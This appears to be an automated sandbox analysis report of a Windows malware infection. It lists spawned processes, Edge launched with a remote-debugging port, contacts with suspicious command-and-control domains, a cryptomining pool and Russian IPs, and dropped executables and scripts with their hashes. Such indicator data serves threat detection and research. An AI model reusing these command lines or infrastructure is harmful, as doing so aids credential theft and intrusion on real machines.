"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2420 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3652 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5072 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3924 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1436"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe292346f8,0x7ffe29234708,0x7ffe29234718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3316 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | joyfulhezart.tech | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 5.75.210.149:443 | tcp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 80.240.16.67:443 | pool.hashvault.pro | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | ls.t.goldenloafuae.com | udp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| GB | 104.86.110.200:80 | e5.o.lencr.org | tcp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| CH | 185.208.156.162:80 | 185.208.156.162 | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 172.217.169.74:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 172.217.169.74:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.180.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.169.65:443 | clients2.googleusercontent.com | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| NL | 45.154.98.175:6969 | tcp | |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.42.65.92:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\mq8kQ9OnO.hta
| MD5 | 24164c55359cb2be793b9f597bc5514b |
| SHA1 | 54dfb3694a5501202fc920de6994f55f69cc5e95 |
| SHA256 | 70e92da33fb6877c1a07b51f1032d5251d4507c40d2682c734da363c18692b11 |
| SHA512 | c2093826d4e38803e79fc61bfd1fdc408a05b98cf9e17e4b890a9e44a7cd2d07a9d3b67d454ebe682ae2db597ff423f4f3e3cc8f8476524c184231d1c80860d8 |
memory/4824-2-0x0000000004880000-0x00000000048B6000-memory.dmp
memory/4824-3-0x00000000050A0000-0x00000000056C8000-memory.dmp
memory/4824-4-0x0000000004FA0000-0x0000000004FC2000-memory.dmp
memory/4824-5-0x0000000005740000-0x00000000057A6000-memory.dmp
memory/4824-6-0x0000000005820000-0x0000000005886000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qjyrybys.5av.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4824-16-0x0000000005990000-0x0000000005CE4000-memory.dmp
memory/4824-17-0x0000000005E10000-0x0000000005E2E000-memory.dmp
memory/4824-18-0x0000000005EC0000-0x0000000005F0C000-memory.dmp
memory/4824-19-0x0000000007550000-0x0000000007BCA000-memory.dmp
memory/4824-20-0x0000000006340000-0x000000000635A000-memory.dmp
memory/4824-22-0x00000000072F0000-0x0000000007386000-memory.dmp
memory/4824-23-0x0000000007250000-0x0000000007272000-memory.dmp
memory/4824-24-0x0000000008180000-0x0000000008724000-memory.dmp
C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE
| MD5 | b5db83c03a37b4cd4746a6080133e338 |
| SHA1 | edf3f7e5c3bda89e1382df8f7d0443783426c834 |
| SHA256 | 8bf5d7ea5c499425488b94f13497a5c3b02997f00ec88fad1b577736fab245df |
| SHA512 | e99da7c87f01dc7459b57d0ce3df799aeb22738840f047c56fb319dc8edddc00ae303ca02916b4b09690df3ff14d559fac44b3e627c6b24498338cfa290fc313 |
memory/2352-32-0x0000000000A60000-0x0000000000F1F000-memory.dmp
memory/628-48-0x0000000000E90000-0x000000000134F000-memory.dmp
memory/2352-46-0x0000000000A60000-0x0000000000F1F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
| MD5 | 2bb133c52b30e2b6b3608fdc5e7d7a22 |
| SHA1 | fcb19512b31d9ece1bbe637fe18f8caf257f0a00 |
| SHA256 | b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630 |
| SHA512 | 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f |
memory/628-63-0x0000000000E90000-0x000000000134F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
| MD5 | 5b3ed060facb9d57d8d0539084686870 |
| SHA1 | 9cae8c44e44605d02902c29519ea4700b4906c76 |
| SHA256 | 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207 |
| SHA512 | 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a |
C:\Users\Admin\AppData\Local\Temp\162.tmp\163.tmp\164.bat
| MD5 | 3895cb9413357f87a88c047ae0d0bd40 |
| SHA1 | 227404dd0f7d7d3ea9601eecd705effe052a6c91 |
| SHA256 | 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785 |
| SHA512 | a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1 |
memory/3272-89-0x000001F3F8CF0000-0x000001F3F8D12000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b6d1564f25c6e55a3521e32f14b9359e |
| SHA1 | f235ae0cf8b7dc38f0ba62f5af709db39721cfbb |
| SHA256 | 2d2e88eb22c7cbb32e7fab4b7ed51742f597b05b0a60796e8f2c3129952627c7 |
| SHA512 | b8ee3d1c7614afd16e3a653ec2433ccfa8f4c01600207b54040f32fb29ad670488c5988ed4430157496f2ccc29c2b1036491bddc707a531b185b65542b2d3d41 |
C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
| MD5 | 6006ae409307acc35ca6d0926b0f8685 |
| SHA1 | abd6c5a44730270ae9f2fce698c0f5d2594eac2f |
| SHA256 | a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b |
| SHA512 | b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718 |
memory/1572-104-0x0000000000D10000-0x00000000011AB000-memory.dmp
memory/628-106-0x0000000000E90000-0x000000000134F000-memory.dmp
memory/2848-108-0x0000000000E90000-0x000000000134F000-memory.dmp
memory/2848-109-0x0000000000E90000-0x000000000134F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
| MD5 | 641525fe17d5e9d483988eff400ad129 |
| SHA1 | 8104fa08cfcc9066df3d16bfa1ebe119668c9097 |
| SHA256 | 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a |
| SHA512 | ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e |
memory/2788-127-0x0000000000D30000-0x0000000000DA0000-memory.dmp
memory/1304-131-0x0000000003910000-0x0000000003915000-memory.dmp
memory/1304-132-0x0000000003910000-0x0000000003915000-memory.dmp
memory/2116-138-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2116-140-0x0000000000400000-0x0000000000466000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fb69a897da24ac74c2ae90ff3fc2ca23 |
| SHA1 | c682a0366ecd6631cad01cfe8f10e198da9a3e9a |
| SHA256 | 8ec36cc1e4ec619067e4781269afd4a68ba2490fb859eded484b731723c15661 |
| SHA512 | d2ee9b6843c726bc3c9ca807214177f1109f8354a4ed83e3f9577ebc223f260a5a6f7bbe71630f9b98c9f585fe7e6a216204aa7aa952967f4e0f59bd47fe599a |
C:\Users\Admin\AppData\Local\Temp\installer.ps1
| MD5 | b6d611af4bea8eaaa639bbf024eb0e2d |
| SHA1 | 0b1205546fd80407d85c9bfbed5ff69d00645744 |
| SHA256 | 8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b |
| SHA512 | d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d |
memory/1572-157-0x0000000000D10000-0x00000000011AB000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\fvlm5rn1\fvlm5rn1.cmdline
| MD5 | 00af5cb02e668eb208955d27c78d5541 |
| SHA1 | b86d0c24270ad2ac53c218c81575a39993fd4115 |
| SHA256 | d0e307dc7c64bb735cb924b381884df95cd500ee848a4451bdd30cf60e67f9d6 |
| SHA512 | c1b6b4b96616a7bbe2742583d9b3205cea5e27a105dd19578301e47085ee84c56db035f25841e1f49c6e790be059c20c41c423a6049c0e873ec462192f38d9c8 |
\??\c:\Users\Admin\AppData\Local\Temp\fvlm5rn1\fvlm5rn1.0.cs
| MD5 | 1809fe3ba081f587330273428ec09c9c |
| SHA1 | d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9 |
| SHA256 | d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457 |
| SHA512 | e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28 |
\??\c:\Users\Admin\AppData\Local\Temp\fvlm5rn1\CSC1D221A13830145B39B7013BD391E7E61.TMP
| MD5 | 7a7a4742cd355e964950d101ec2936fb |
| SHA1 | 81ac58d0f392c05616b7467260816a89f134aa7d |
| SHA256 | 0a6e1104c5cfad76194663187363df38fda97b83837f89885e62d2e3623e0b86 |
| SHA512 | 1b3ad66412a64363c2696843c42943da95a2c281bc23ef7623c58a6b2779ecd0ad83f86ba1fc7594458a7f300e48a3f3c93659c037290aa6aeb2192ca530961d |
C:\Users\Admin\AppData\Local\Temp\RES35B1.tmp
| MD5 | f81b6fc29eed33b7f9a66137a68bf76b |
| SHA1 | 9dfd8435032016ec6e053d507c973047905f504c |
| SHA256 | 93e2cd8bd1bbcff820e381b553568c18afc0902f4998a72abf42fcd0cd41f580 |
| SHA512 | ff8d588bb1ae8ef21444c537ebdefe616b877f04a38bcb331c8d08f57f6bbbf090781cf8557b08777982b933f43bb0728eabe4c54bd71e27eaa8de0876e8defe |
C:\Users\Admin\AppData\Local\Temp\fvlm5rn1\fvlm5rn1.dll
| MD5 | 7e2efb8916dc921e3aac19040933b9a0 |
| SHA1 | 72bc068c9220fe66038db6c85a9e61ff2030dee9 |
| SHA256 | 45ccd91e10d1e4748208bac7e0270e813ef7f2c0bf5d5f6c028ba484da1b2fba |
| SHA512 | 1c7cb1c02f7255403ad2b781a3814dcd44d4c4bf86bebfc868d520a627da34c3eb98048ca47d83326290f5fcdebb9ca17bdf5aed2117486e8d0928c1787cb405 |
memory/4940-170-0x0000022CC9570000-0x0000022CC9578000-memory.dmp
memory/3404-172-0x000000000D0B0000-0x000000000D933000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
| MD5 | d39df45e0030e02f7e5035386244a523 |
| SHA1 | 9ae72545a0b6004cdab34f56031dc1c8aa146cc9 |
| SHA256 | df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2 |
| SHA512 | 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64 |
memory/4896-196-0x000001F6118B0000-0x000001F6118C2000-memory.dmp
memory/4896-197-0x000001F611C60000-0x000001F611C70000-memory.dmp
memory/2116-198-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2116-200-0x0000000003870000-0x0000000003875000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
| SHA256 | 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221 |
| SHA512 | c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f |
memory/4044-218-0x0000000000F00000-0x0000000000F60000-memory.dmp
memory/2012-223-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2012-220-0x0000000000400000-0x0000000000429000-memory.dmp
memory/628-224-0x0000000000E90000-0x000000000134F000-memory.dmp
memory/628-225-0x0000000000E90000-0x000000000134F000-memory.dmp
memory/1436-228-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp
memory/1436-229-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp
memory/1436-237-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp
memory/1436-238-0x00000255B31F0000-0x00000255B3210000-memory.dmp
memory/1436-240-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp
memory/1436-243-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp
memory/1436-241-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp
memory/1436-239-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp
memory/1436-242-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp
memory/4896-244-0x000001F62C1D0000-0x000001F62C6F8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe
| MD5 | 9da08b49cdcc4a84b4a722d1006c2af8 |
| SHA1 | 7b5af0630b89bd2a19ae32aea30343330ca3a9eb |
| SHA256 | 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd |
| SHA512 | 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e60635010b08caacd102600f0cbf7b8a |
| SHA1 | 426fc50efc506813fafe64ffac9409959e829ee7 |
| SHA256 | 82625676e5cada386641eec46db64c792ef2391e699d6d739b37a24d71ed351a |
| SHA512 | 41bd62aaac472ad7820515de1c91a206bc3bce4ef341d198edf4de23be562dea15a72046ed972a8f335e0c50c47b88e1f97b78e9cbbb2400effbc62110cadb14 |
C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe
